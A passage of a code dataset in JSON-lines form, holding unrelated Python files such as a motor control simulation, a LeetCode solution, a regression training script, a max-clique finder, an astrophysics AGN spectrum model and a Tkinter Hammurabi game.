sampling_time=plant_parameters[0]\n J=plant_parameters[1]\n B=plant_parameters[2]\n R=plant_parameters[3]\n Ld=plant_parameters[4]\n Lq=plant_parameters[5]\n Ke=plant_parameters[6]\n P=plant_parameters[7]\n\n Kpp = control_parameters[0]\n Kpv = control_parameters[1]\n Kiv = control_parameters[2]\n Kpi = control_parameters[3]\n Kii = control_parameters[4]\n\n qm_cmd = external_inputs[0]\n dqm_cmd = external_inputs[1]\n torque_reac = external_inputs[2]\n\n # simulation object\n sim_env = SimulationEnvironment(sampling_time = sampling_time)\n IPMSM_motor = IPMSM(Ld=Ld, Lq=Lq, Ke=Ke, R=R, P=P, sampling_time=sim_env.sampling_time, control_sampling_time=sampling_time)\n rigid_rotor = RigidRotor(J=J, B=B, sampling_time = sim_env.sampling_time, control_sampling_time=sampling_time)\n\n # main loop 10[sec]\n for i in range(int(simulation_time*(1/sim_env.sampling_time))):\n time = i * sim_env.sampling_time\n\n control_delay = (int)(IPMSM_motor.control_sampling_time/sim_env.sampling_time) #[sample]\n if i%control_delay == 0:\n \"\"\" controller \"\"\"\n # definition for control parameters\n if i == 0 :\n id_err_int = 0.0\n iq_err_int = 0.0\n\n # position controller (P position feedback control)\n qm_err = qm_cmd[i] - rigid_rotor.xvec[0]\n dqm_ref = Kpp * qm_err\n\n # velocity controller (P velocity feedback control)\n dqm_err = dqm_ref - rigid_rotor.xvec[1]\n iq_ref = Kpv * dqm_err # + dqm_cmd[i]\n\n # current controller (PI current feedback control)\n # d current control: Id = 0\n id_cmd = 0.0\n id_err = id_cmd - IPMSM_motor.xvec[0]\n id_err_int = id_err_int + id_err * IPMSM_motor.control_sampling_time\n vd = Kpi * id_err + Kii * id_err_int\n # q current control\n iq_err = iq_ref - IPMSM_motor.xvec[1]\n iq_err_int = iq_err_int + iq_err * IPMSM_motor.control_sampling_time\n vq = Kpi * iq_err + Kii * iq_err_int\n\n #data update\n time_data.append(time)\n id_data.append(IPMSM_motor.xvec[0])\n iq_data.append(IPMSM_motor.xvec[1])\n qm_data.append(rigid_rotor.xvec[0])\n dqm_data.append(rigid_rotor.xvec[1])\n qm_cmd_data.append(qm_cmd[i])\n dqm_cmd_data.append(dqm_cmd[i])\n dqm_ref_data.append(dqm_ref)\n id_cmd_data.append(id_cmd)\n iq_ref_data.append(iq_ref)\n qm_err_data.append(qm_err)\n dqm_err_data.append(dqm_err)\n id_err_data.append(id_err)\n iq_err_data.append(iq_err)\n\n \"\"\" controller end \"\"\"\n\n \"\"\" plant \"\"\"\n\n # derivative calculation\n rigid_rotor.dxvec = rigid_rotor.calc_deri(IPMSM_motor.torque, torque_reac[i])\n IPMSM_motor.dxvec = IPMSM_motor.calc_deri(vd, vq, rigid_rotor.xvec[1])\n # euler-integration\n rigid_rotor.update()\n IPMSM_motor.update()\n\n \"\"\" plant end \"\"\"\n\n # data plot\n from matplotlib import pyplot as plt\n plt.figure(figsize=(10, 7))\n plt.subplot(421)\n plt.plot(time_data, qm_cmd_data, label=\"theta motor cmd\")\n plt.plot(time_data, qm_data, label=\"theta motor res\")\n plt.legend()\n plt.grid()\n plt.ylabel('theta [rad]')\n\n plt.subplot(423)\n plt.plot(time_data, dqm_ref_data, label=\"omega motor cmd\")\n plt.plot(time_data, dqm_data, label=\"omega motor res\")\n plt.legend()\n plt.grid()\n plt.ylabel('omega [rad/s]')\n\n plt.subplot(425)\n plt.plot(time_data, id_cmd_data, label=\"id cmd\")\n plt.plot(time_data, id_data, label=\"id res\")\n plt.legend()\n plt.grid()\n plt.ylabel('current [A]')\n\n plt.subplot(427)\n plt.plot(time_data, iq_ref_data, label=\"iq cmd\")\n plt.plot(time_data, iq_data, label=\"iq res\")\n plt.legend()\n plt.grid()\n plt.ylabel('current [A]')\n\n plt.subplot(422)\n plt.plot(time_data, qm_err_data, label=\"theta error\")\n plt.legend()\n plt.grid()\n\n plt.subplot(424)\n plt.plot(time_data, dqm_err_data, label=\"omega error\")\n plt.legend()\n plt.grid()\n\n plt.subplot(426)\n plt.plot(time_data, id_err_data, label=\"id error\")\n plt.legend()\n plt.grid()\n\n plt.subplot(428)\n plt.plot(time_data, iq_err_data, label=\"iq error\")\n plt.legend()\n plt.grid()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n\n simulation_time = 3.0\n sampling_time = 0.0001 # 100 us\n\n #################################################################\n ### example 2 IPMSM positioning\n #################################################################\n Ld=3.9*0.001\n Lq=7.9*0.001\n Ke=47.21*0.001\n R=154.9*0.001\n P=3\n J=0.1\n B=0.001\n plant_parameters = [sampling_time, J, B, R, Ld, Lq, Ke, P]\n\n # Command\n qm_cmd = []\n dqm_cmd = []\n for i in range(int(simulation_time/sampling_time)):\n time = i * sampling_time\n if time <= 0.5:\n qm_cmd_tmp = 0.0\n dqm_cmd_tmp = 0.0\n else:\n qm_cmd_tmp = 1.0\n dqm_cmd_tmp = 0.0\n qm_cmd.append(qm_cmd_tmp)\n dqm_cmd.append(dqm_cmd_tmp)\n\n # Disturbance\n torque_reac = []\n for i in range(int(simulation_time/sampling_time)):\n time = i * sampling_time\n torque_reac_tmp = 0.0\n torque_reac.append(torque_reac_tmp)\n\n external_inputs = [qm_cmd, dqm_cmd, torque_reac]\n\n # Position gains\n Kpp = 2.0 # P gain for velocity control loop\n Kpv = 10.0 # P gain for velocity control loop\n Kiv = 0.5 # I gain for velocity control loop\n Kpi = 5.0 # P gain for current control loop\n Kii = 1.5 # I gain for current control loop\n control_parameters = [Kpp, Kpv, Kiv, Kpi, Kii]\n\n # Simulation\n IPMSM_positioning(simulation_time, plant_parameters, control_parameters, external_inputs)\n","sub_path":"examples/example_ipmsm_positioning.py","file_name":"example_ipmsm_positioning.py","file_ext":"py","file_size_in_byte":6507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"341367867","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 9 20:11:18 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n def moveZeroes(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: None Do not return anything, modify nums in-place instead.\r\n \"\"\"\r\n l = len(nums)\r\n \r\n for i in range(0,l,1):\r\n while nums[i]==0:\r\n if nums[i+1:] == [0]*(l-i-1):\r\n break\r\n nums[i:-1] = nums[i+1:]\r\n nums[-1] = 0\r\n \r\n return nums","sub_path":"Leetcode/#283 Move Zeroes.py","file_name":"#283 Move Zeroes.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"409588639","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2016-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree. An additional grant\n# of patent rights can be found in the PATENTS file in the same directory.\n\nimport os\nimport stat\n\nimport hypothesis\nfrom eden.test_support.hypothesis import FILENAME_STRATEGY\n\nfrom .lib import testcase\n\n\n@testcase.eden_repo_test\nclass HypothesisSimpleTest(testcase.EdenRepoTest):\n def populate_repo(self) -> None:\n self.repo.write_file(\"hello\", \"hola\\n\")\n self.repo.write_file(\"adir/file\", \"foo!\\n\")\n self.repo.write_file(\"bdir/test.sh\", \"#!/bin/bash\\necho test\\n\", mode=0o755)\n self.repo.write_file(\"bdir/noexec.sh\", \"#!/bin/bash\\necho test\\n\")\n self.repo.symlink(\"slink\", \"hello\")\n self.repo.commit(\"Initial commit.\")\n\n @hypothesis.given(FILENAME_STRATEGY)\n def test_create(self, basename: str) -> None:\n filename = os.path.join(self.mount, basename)\n\n # Ensure that we don't proceed if hypothesis has selected a name that\n # conflicts with the names we generated in the repo.\n hypothesis.assume(not os.path.exists(filename))\n\n with open(filename, \"w\") as f:\n f.write(\"created\\n\")\n\n entries = sorted(os.listdir(self.mount))\n self.assertEqual(\n sorted([\".eden\", \"adir\", \"bdir\", \"hello\", basename, \"slink\"]), entries\n )\n\n with open(filename, \"r\") as f:\n self.assertEqual(f.read(), \"created\\n\")\n\n st = os.lstat(filename)\n self.assertEqual(st.st_size, 8)\n self.assertTrue(stat.S_ISREG(st.st_mode))\n","sub_path":"eden/integration/hypothesis_simple_test.py","file_name":"hypothesis_simple_test.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"368347082","text":"import csv \nimport numpy as np\nfrom numpy.linalg import inv\nimport random\nimport math\nimport sys\nimport matplotlib.pyplot as plt\n\n#feature scaling\n#adagrade\n#N-fold cross validation\n#batch\n\ndata = []\nhour = 9\nlambda_w = 0.0001\n\nfor i in range(18):\n data.append([])\n\nn_row = 0\ntext = open('data/train.csv', 'r', encoding='big5') \nrow = csv.reader(text , delimiter=\",\")\nfor r in row:\n if n_row != 0:\n for i in range(3,27):\n if r[i] != \"NR\":\n data[(n_row-1)%18].append(float(r[i]))\n else:\n data[(n_row-1)%18].append(float(0)) \n n_row = n_row+1\ntext.close()\n\nx = []\ny = []\n\nfor i in range(12):\n # 一個月取連續10小時的data可以有471筆\n for j in range(480-hour):\n x.append([])\n # 18種污染物\n for t in range(18):\n # if t!=9:\n # continue\n # 連續9小時\n for s in range(hour):\n x[(480-hour)*i+j].append(data[t][480*i+j+s] )\n # x[(480-hour)*i+j].append(data[t][480*i+j+s]**2 )\n y.append(data[9][480*i+j+hour])\nx = np.array(x)\ny = np.array(y)\n\nprint(x.shape)\n# x_mean = np.reshape(np.repeat(x.mean(axis=0),x.shape[0]),x.shape) \n# x_std = np.reshape(np.repeat(x.std(axis=0),x.shape[0]),x.shape) \n# x = (x-x_mean)/x_std\n\n# add square term\n# x = np.concatenate((x,x**2), axis=1)\n\n# add bias\nx = np.concatenate((np.ones((x.shape[0],1)),x), axis=1)\n\nw = np.zeros(len(x[0]))\nl_rate = 10\nrepeat = int(1e6)\n\nx_t = x.transpose()\ns_gra = np.zeros(len(x[0]))\n\ncosts = []\n# pre_cost = 1e6\n\nfor i in range(repeat):\n hypo = np.dot(x,w)\n loss = hypo - y\n cost = np.sum(loss**2 )/ len(x) + lambda_w*np.sum(w**2) \n # if cost > pre_cost and i>repeat//100:\n # break\n # pre_cost = cost\n cost_a = math.sqrt(cost)\n gra = np.dot(x_t,loss) + lambda_w*w*len(x)\n s_gra += gra**2\n ada = np.sqrt(s_gra)\n w = w - l_rate * gra/ada\n print ('iteration: %d | Cost: %f ' % ( i,cost_a))\n costs.append(cost_a)\n\n#use close form to check whether ur gradient descent is good\n# however, this cannot be used in hw1.sh \nw_closed = np.matmul(np.matmul(inv(np.matmul(x.transpose(),x)),x.transpose()),y)\n\n\n# save model\nnp.save(\"model_linear_all_\"+str(hour)+\"_regularized_\"+str(lambda_w)+\".npy\",w)\n# read model\n\n\nplt.xlabel('epoch', fontsize = 18)\nplt.ylabel('cost', fontsize = 18)\nplt.axis([0, len(costs), 4, 10])\n\nd1p, = plt.plot([i for i in range(len(costs))], costs, linewidth=0.5, color='g', markersize=0.3)\nplt.legend([d1p], [\"traing cost = \"+str(round(costs[-1],6) )])\n\nplt.savefig('result/traing_curve_linear_all_'+str(hour)+\"_regularized_\"+str(lambda_w)+'.png', format='png', dpi=1000)\n# plt.show()","sub_path":"hw1/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642018205","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\ndef treat_area_palm(hand_localised, palm, palm_center, copy):\r\n\r\n palm_area_draw = np.array([(pts[0], pts[1]) for pts in palm if pts != (0, 0)])\r\n \r\n if palm_area_draw != []: \r\n cv2.drawContours(copy, [palm_area_draw], 0, (0, 255, 0), 1)\r\n palm_area = cv2.contourArea(palm_area_draw)\r\n\r\n if palm_area < 300: print(\"peut etre main non tournée paume et on peut definir la main\", palm_area)\r\n elif palm_area > 300: print(\"main tournée paume et on peut definir la main\", palm_area)\r\n\r\n cv2.circle(copy, palm_center, 2, (255, 255, 255), 1)\r\n [cv2.circle(copy, pts, 2, (0, 0, 0), 1) for pts in palm]\r\n\r\n #cv2.imshow(\"palm\", copy)\r\n #cv2.waitKey(0)\r\n\r\n\r\ndef printing(fingers):\r\n print(\"PALM ANALYSIS\")\r\n print(\"fingers : \", fingers, \"\\n\")\r\n\r\ndef palm_analyse(hand_localised, palm_center, palm, rectangle, crop,\r\n fingers):\r\n\r\n copy = crop.copy()\r\n #printing(fingers)\r\n\r\n treat_area_palm(hand_localised, palm, palm_center, copy)\r\n\r\n\r\n\r\n","sub_path":"hand/palm_analyse.py","file_name":"palm_analyse.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"373864165","text":"import math\nfrom collections import OrderedDict\nfrom lsdj.models.phrase import Phrase\nfrom lsdj.utils import chunks\n\n\ndef get_track_events(track, resolution):\n semi_quaver = (resolution / 2) / 2\n notes_at_tick = {}\n\n # Get time signature events\n time_sigs = [tick for tick in track if tick.name == 'Time Signature']\n notes = [tick for tick in track if tick.name == 'Note On']\n end_of_song = [tick for tick in track if tick.name == 'End of Track'][0]\n tempos = [tick for tick in track if tick.name == 'Set Tempo']\n for tick in range(0, (end_of_song.tick + semi_quaver), semi_quaver):\n notes_at_tick[tick] = []\n\n for index, note in enumerate(notes):\n next_note = notes[index + 1] if index != (\n len(notes) - 1) else end_of_song\n note_delta = next_note.tick - note.tick\n if note_delta % semi_quaver == 0:\n notes_at_tick[note.tick].append(note)\n\n return {\n 'notes': OrderedDict(\n sorted(notes_at_tick.items(), key=lambda t: t[0])\n ),\n 'time_sigs': time_sigs,\n 'end_of_song': end_of_song,\n 'semi_quaver': semi_quaver,\n 'tempos': tempos\n }\n\n\ndef get_phrases(notes, time_sigs, end_of_song, semi_quaver):\n phrases = []\n processed_notes = notes\n for index, time_sig in enumerate(time_sigs):\n next_time_sig = time_sigs[index + 1] if index != (len(time_sigs) - 1) else end_of_song\n fraction_resolution = 16 / time_sig.denominator\n notes_per_phrase = (time_sig.numerator * fraction_resolution)\n time_sig_length = next_time_sig.tick - time_sig.tick\n time_sig_bars = time_sig_length / (notes_per_phrase * semi_quaver)\n for phrase_index in range(0, time_sig_bars):\n start_tick = time_sig.tick + (phrase_index * (notes_per_phrase * semi_quaver))\n end_tick = start_tick + (notes_per_phrase * semi_quaver)\n phrase_count = int(math.ceil(notes_per_phrase / 16)) + 1\n if phrase_count > 1:\n for offset_index, phrase in enumerate(range(0, phrase_count)):\n end_offset = end_tick - ((notes_per_phrase % 16) * semi_quaver)\n new_start_tick = start_tick if offset_index == 0 else end_offset\n new_end_tick = end_offset if offset_index == 0 else end_tick\n note_count = 16 if offset_index == 0 else (notes_per_phrase % 16)\n note_range = range(new_start_tick, new_end_tick, 120)\n phrase_notes = {k: processed_notes[k] for k in note_range}\n notes = OrderedDict(sorted(phrase_notes.items(), key=lambda t: t[0]))\n phrases.append(\n Phrase(\n note_count,\n new_start_tick,\n new_end_tick,\n '{0}/{1}'.format(time_sig.numerator, time_sig.denominator),\n notes\n )\n )\n else:\n note_range = range(start_tick, end_tick, 120)\n phrase_notes = {k: processed_notes[k] for k in note_range}\n notes = OrderedDict(sorted(phrase_notes.items(), key=lambda t: t[0]))\n phrases.append(\n Phrase(\n notes_per_phrase,\n start_tick,\n end_tick,\n '{0}/{1}'.format(time_sig.numerator, time_sig.denominator),\n notes\n )\n )\n\n return phrases\n\n\ndef deduplicate_phrases(phrases, phrase_offset=0):\n b64_phrase_dict = {}\n b64_phrase_keys = []\n\n for phrase in phrases:\n phrase_key = phrase.notes_as_b64\n if not b64_phrase_dict.get(phrase_key, None):\n b64_phrase_dict[phrase_key] = phrase.notes\n b64_phrase_keys.append(phrase_key)\n\n phrase_dict = {}\n phrase_dict_lookup = {}\n phrase_keys = []\n\n for index, key in enumerate(b64_phrase_dict.keys()):\n new_index = index + int(phrase_offset)\n phrase_dict[new_index] = b64_phrase_dict[key]\n phrase_dict_lookup[key] = new_index\n\n for phrase in b64_phrase_keys:\n phrase_keys.append(phrase_dict_lookup[phrase])\n\n return {\n 'phrases': phrase_dict,\n 'keys': phrase_keys\n }\n\n\ndef get_chains(phrase_keys):\n return list(chunks(phrase_keys, 16))\n","sub_path":"lsdj/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"403739194","text":"def add(a,b):\n c=a+b\n print(c)\ndef prime(n):\n temp=0\n for i in range(1,n+1):\n if(n%i==0):\n temp+=1\n if temp==2:\n return True\n else:\n return False\n","sub_path":"01-10-2019/packeges/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"381632359","text":"# -*- coding: utf-8 -*-\n\nfrom openerp.osv import fields, osv\nimport openerp.addons.decimal_precision as dp\n\nclass comisiones_por_producto(osv.osv):\n _name = 'comisiones.producto'\n\n _columns = {\n 'vendedor_id': fields.many2one('hr.employee', 'Vendedor'),\n 'product_id': fields.many2one('product.product', string='Producto'),\n 'porcentaje_comision': fields.float('% Comision'),\n }\n\nclass comisiones_por_categoria_producto(osv.osv):\n _name = 'comisiones.categoria_producto'\n\n _columns = {\n 'vendedor_id': fields.many2one('hr.employee', 'Vendedor'),\n 'categ_id': fields.many2one('product.category', string='Categoria de producto'),\n 'porcentaje_comision': fields.float('% Comision'),\n }\n\n\nclass comisiones_por_rango(osv.osv):\n _name = 'comisiones.rango'\n\n _columns = {\n 'vendedor_id': fields.many2one('hr.employee', 'Vendedor'),\n 'categ_id': fields.many2one('product.category', string='Categoria de producto'),\n 'minimo': fields.float('Minimo', required=True),\n 'maximo': fields.float('Maximo', required=True),\n 'porcentaje_comision': fields.float('% Comision', required=True),\n }\n _order = 'categ_id, minimo asc'\n","sub_path":"models/comisiones.py","file_name":"comisiones.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"109184293","text":"import pickle\nimport numpy as np\nimport pandas as pd\nimport time\nfrom model.helper_functions import stub_withhold_split, val_test_features\n\n\nstart_time = time.time(), time.ctime()\nprint(f'Start time: {start_time[1]}')\n\n# Build df of playlists to classify in clusters\nval_pids = np.genfromtxt('../data/val_pids.csv', skip_header=1, dtype=int)\n\n# Import data to memory so it is not loaded from disk for every loop iteration\nplaylist_df = pd.read_csv('../data/playlists.csv')\ntrack_df = pd.read_csv('../data/songs_100000_feat_cleaned.csv', index_col='track_uri')\ntop_artists = np.genfromtxt('../data/top_playlist_defining_artists_train.csv', usecols=0,\n skip_header=0, delimiter=',', dtype=str)\n\n# Create output vessels\nval_stub_feat_dfs = [None]*len(val_pids)\nerrors = 0\n\n# Loop through pids and make features\nfor idx, pid in enumerate(val_pids):\n try:\n stub_tracks, withhold_tracks = stub_withhold_split(pid)\n stub_playlist_feats = val_test_features(stub_tracks, track_df=track_df, top_artists=top_artists, pid=pid)\n val_stub_feat_dfs[idx] = stub_playlist_feats\n except Exception as e:\n print(f'Error for pid {pid}: \\n{e}')\n errors += 1\n\n if (idx + 1) % 100 == 0:\n print(f'[{time.ctime()}] Progress {idx+1} playlists and {errors} errors')\n\nplaylist_features_val = pd.concat(val_stub_feat_dfs, axis=0)\n\nend_time = time.time(), time.ctime()\ntime_elapsed = end_time[0]-start_time[0]\ntime_elapsed = time.strftime('%H:%M:%S', time.gmtime(time_elapsed))\nprint(f'End time: {end_time[1]}, Time elapsed: {time_elapsed}')\n\n# Save output\nplaylist_features_val.to_csv('../data/playlist_features_with_artists_val.csv', sep=',', index=True)\n","sub_path":"model/k6_pre-processing_val.py","file_name":"k6_pre-processing_val.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528308018","text":"from __future__ import print_function\nimport numpy as np\nimport h5py\nimport powderday.config as cfg\n\n'''\n agn_spectrum using Nenkova+ (2008) torus models. Model calculations from CLUMPY (https://www.clumpy.org). Total spectrum is calculated as (Torus Flux) + (probability of AGN photon escape)x(AGN Flux). AGN spectra are assumed to be piecewise power-law (Rowan-Robinson 1995) with spectral breaks from Nenkova et al. Default CLUMPY model parameters taken from Nenkova et al.\n\n CLUMPY returns spectra in lambda * Flambda (arbitrary units). We scale such that the integrated Flambda gives the total IR luminosity.\n\n - Ray Sharma\n'''\n\n\nclass Nenkova2008:\n def __init__(self, params=[5, 30, 0, 1.5, 30, 40]):\n N0, Y, i, q, sig, tv = params\n self.N0 = N0\n self.Y = Y\n self.i = i\n self.q = q\n self.sig = sig\n self.tv = tv\n\n def agn_spectrum(self, log_L_bol):\n try:\n h = h5py.File(cfg.par.BH_modelfile, 'r')\n except:\n raise IOError('Unable to find Nenkova BH model file. '\n 'Check the path in parameters master, or '\n 'download the file here: https://www.clump'\n 'y.org/downloads/clumpy_models_201410_tvav'\n 'g.hdf5')\n\n ix = ((h['N0'][:] == self.N0) &\n (h['Y'][:] == self.Y) &\n (h['i'][:] == self.i) &\n (h['q'][:] == self.q) &\n (h['sig'][:] == self.sig) &\n (h['tv'][:] == self.tv))\n\n nu_vec = 3e14 / h['wave'][:]\n\n frac_AGN_obsc = h['ptype1'][:][ix][0]\n l_band_vec_torus = h['flux_tor'][:][ix][0]\n l_band_vec_AGN = h['flux_toragn'][:][ix][0] - l_band_vec_torus\n l_band_vec = l_band_vec_torus + (frac_AGN_obsc * l_band_vec_AGN)\n\n l_band_vec = self.scale_spectrum(l_band_vec, nu_vec, log_L_bol)\n\n l_band_vec = np.log10(l_band_vec)\n l_band_vec = np.concatenate((l_band_vec, [0, 0, 0, 0]))\n nu_vec = np.log10(nu_vec)\n nu_vec = np.concatenate((nu_vec, [-1, -2, -3, -4]))\n\n to_cgs = np.log10(3.9) + 33\n return nu_vec, l_band_vec + to_cgs\n\n def scale_spectrum(self, l_band_vec, nu_vec, log_L_bol):\n ''' Scale the spectrum by (total IR luminosity) / (integrated spectrum in arb. units)\n '''\n L_IR = 10**self.bol_correct_IR(log_L_bol)\n integrated_spec = np.trapz(l_band_vec / nu_vec, nu_vec)\n norm = L_IR / abs(integrated_spec)\n return l_band_vec * norm\n\n def bol_correct_IR(self, log_L_bol, c1=17.87, k1=0.28, c2=10.03, k2=0.020):\n ''' Return log IR luminosity using bolometric corrections from Hopkins+ (2006). Defaults to 15micron band corrections.\n '''\n L_bol = 10**log_L_bol\n L_IR = L_bol / (c1 * pow(L_bol / 1e10, k1) +\n c2 * pow(L_bol / 1e10, k2))\n return np.log10(L_IR)\n","sub_path":"powderday/agn_models/nenkova.py","file_name":"nenkova.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"277316576","text":"import time\nimport networkx as NX\nfrom datetime import timedelta\nfrom multiprocessing import Process, Queue, Value\n\nMETRICS = \"metrics-pattern.txt\"\n\ndef expand(wid, G, K, cand, fini, max_clique_size, calls_made, q_out):\n\n if calls_made is not None:\n with calls_made.get_lock():\n calls_made.value += 1\n\n if len(cand) == 0 and len(fini) == 0:\n with max_clique_size.get_lock():\n if len(K) > max_clique_size.value:\n max_clique_size.value = len(K)\n q_out.put((wid, K.copy()))\n return\n\n pivot = max(cand | fini, key=lambda u: len(cand & set(G.neighbors(u))))\n\n ext = cand - set(G.neighbors(pivot))\n\n for q in ext:\n\n Kq = K | {q}\n\n candq = cand & set(G.neighbors(q))\n finiq = fini & set(G.neighbors(q))\n\n cand = cand - {q}\n fini = fini | {q}\n\n expand(wid, G, Kq, candq, finiq,\n max_clique_size, calls_made, q_out)\n\ndef calc_max_clique(wid, G, max_clique_size, calls_made, q_in, q_out):\n\n quit = False\n\n while not quit:\n\n item = q_in.get()\n\n if item == None:\n quit = True\n continue\n\n if G.degree(item) >= max_clique_size.value:\n\n CAND = {item}\n\n # check if the vertexes\n # verify the clique condition\n for neighbor in G.neighbors(item):\n if G.degree(neighbor) >= max_clique_size.value:\n CAND.add(neighbor)\n\n expand(wid, G, set(), CAND, set(),\n max_clique_size, calls_made, q_out)\n\ndef process_parallel(G, workers_num, calls_made=None):\n\n workers = []\n queues = []\n outq = Queue()\n\n max_clique = []\n max_clique_size = Value('i', 2)\n\n for w in range(workers_num):\n queues.append(Queue())\n\n nodes = G.nodes()\n\n print(\"nodes: {}\".format(nodes))\n\n # Order nodes by its degree\n nodes = list(map(lambda x: (x, G.degree(x)), nodes))\n nodes = sorted(nodes, key=lambda x: x[1])\n nodes = list(map(lambda x: x[0], nodes))\n\n for v in range(len(nodes)):\n queues[v % workers_num].put(nodes[v])\n\n start = time.time()\n\n for w in range(workers_num):\n p = Process(target=calc_max_clique, args=(w, G,\n max_clique_size,\n calls_made,\n queues[w], outq,))\n workers.append(p)\n p.start()\n\n for qw in queues:\n qw.put(None)\n\n for w in workers:\n w.join()\n\n\n count_of_cliques_received = outq.qsize()\n\n # Find the maximum clique\n while not outq.empty(): \n wid, clique = outq.get()\n\n print(\"wid: {}, clique: {}\".format(wid, clique))\n\n if len(clique) > len(max_clique):\n max_clique = clique\n\n return max_clique, count_of_cliques_received\n \n\ndef maxclique(graph, workers_num, loaded=False, metrics=False, name='none'):\n \n if not loaded:\n G = NX.read_edgelist(graph)\n else:\n G = graph\n\n print(\"Graph - Nodes: {}, Edges: {}\".format(\n len(G.nodes()), len(G.edges())))\n\n start = time.time()\n\n max_clique, _ = process_parallel(graph, workers_num)\n \n end = time.time()\n\n d = end - start\n dt = time.strptime(str(timedelta(seconds=d)).split(\".\")[0], \"%H:%M:%S\")\n\n print(\"Delta time: hour: {}, min: {}, sec: {}\".format(\n dt.tm_hour,\n dt.tm_min,\n dt.tm_sec))\n\n # Writes and prints the metrics\n if metrics:\n # Metrics values\n calls_made = Value('i', 0)\n _, count_of_cliques_received = process_parallel(graph, workers_num, calls_made=calls_made)\n \n\n print(\"Cliques found: {}, Calls made: {}\".format(\n count_of_cliques_received, calls_made.value))\n\n result_metrics = \"{},{},{},{},{},{}\\n\".format(\n name,\n len(G.nodes()),\n len(G.edges()),\n count_of_cliques_received,\n calls_made.value, d)\n with open(METRICS, \"a\") as f:\n f.write(result_metrics)\n\n return list(max_clique)\n\n\n","sub_path":"pattern/src/algorithms/TTT/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"9657160","text":"#!/usr/bin/env python3\n\"\"\"List command available with provided API key\"\"\"\n\nimport argparse\nimport dreampylib\n\n\ndef main():\n \"\"\"List command available with provided API key\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('apikey', help='Your dreamhost API key')\n args = parser.parse_args()\n\n connection = dreampylib.DreampyLib(args.apikey)\n if not connection.is_connected():\n raise Exception(\"Unable to connect\")\n\n print(\", \".join(dir(connection)))\n\nif __name__ == '__main__':\n main()\n","sub_path":"dreampylib/tools/dh_list_commands.py","file_name":"dh_list_commands.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"8159827","text":"#!/usr/bin/env python\r\nimport tkinter as tk\r\nimport tkinter.font as tkFont\r\nfrom tkinter import scrolledtext\r\nfrom tkinter import messagebox\r\nimport Hammurabi\r\nimport random\r\n\r\n## First Class is for getting player's name\r\n\r\nBUY = +1\r\nSELL = -1\r\n\r\nWIN_W = 370\r\nWIN_H = 510\r\n\r\nclass Welcome:\r\n '''Class to start the Hammurabi game, asking the user for the Ruler's name.'''\r\n def __init__(self, master):\r\n self.master = master\r\n self.master.geometry(\"300x150\")\r\n self.master.minsize(275, 135)\r\n self.master.title(\"Welcome to Babylon!\")\r\n self.frame = tk.Frame(self.master)\r\n self.l1 = tk.Label(self.frame, \r\n text='Oh great Ruler, welcome to Babylon.',\r\n font=('Arial',13))\r\n self.l2 = tk.Label(self.frame, \r\n text='What is your name?',\r\n font=('Arial',10))\r\n self.currentRuler = tk.StringVar()\r\n self.currentRuler.set('Hammurabi')\r\n self.my_name = tk.Entry(self.frame, textvariable = self.currentRuler, width = 20)\r\n self.button1 = tk.Button(self.frame, text = \"Start\", command = self.game_window)\r\n self.helpBtn1 = tk.Button(self.frame, text = \"Help\", command = self.show_start_help)\r\n self.quitButton = tk.Button(self.frame, text = 'Quit', command = self.close_windows)\r\n self.l1.pack(pady=5)\r\n self.l2.pack()\r\n self.my_name.pack()\r\n self.button1.pack(padx = 5, pady=10, side = tk.LEFT, fill = tk.X, expand = True)\r\n self.helpBtn1.pack(padx = 5, pady=10, side = tk.LEFT, fill = tk.X, expand = True)\r\n self.quitButton.pack(padx = 5, pady=10, side = tk.RIGHT, fill = tk.X, expand = True)\r\n self.frame.pack(pady = 10)\r\n \r\n def show_start_help(self):\r\n msg = ''' To play the game of Hammurabi,\r\n Type your name in the box and click \"Start\".\r\n \r\n You will serve your term in office buying & selling land, \r\n planting & harvesting seed, and feeding your people.\r\n \r\n The default term is 10 years. If you want a different \r\n term, append it to the name with a # mark, followed \r\n by the number of years, as in Hammurabi#15'''\r\n messagebox.Message(parent=self.master,title='Help',message=msg).show()\r\n \r\n def game_window(self):\r\n self.gameWindow = tk.Toplevel(self.master)\r\n self.gameWindow.title('Oracle of Babylon')\r\n self.master.withdraw()\r\n self.master.title(\"Welcome Back!\")\r\n self.app = 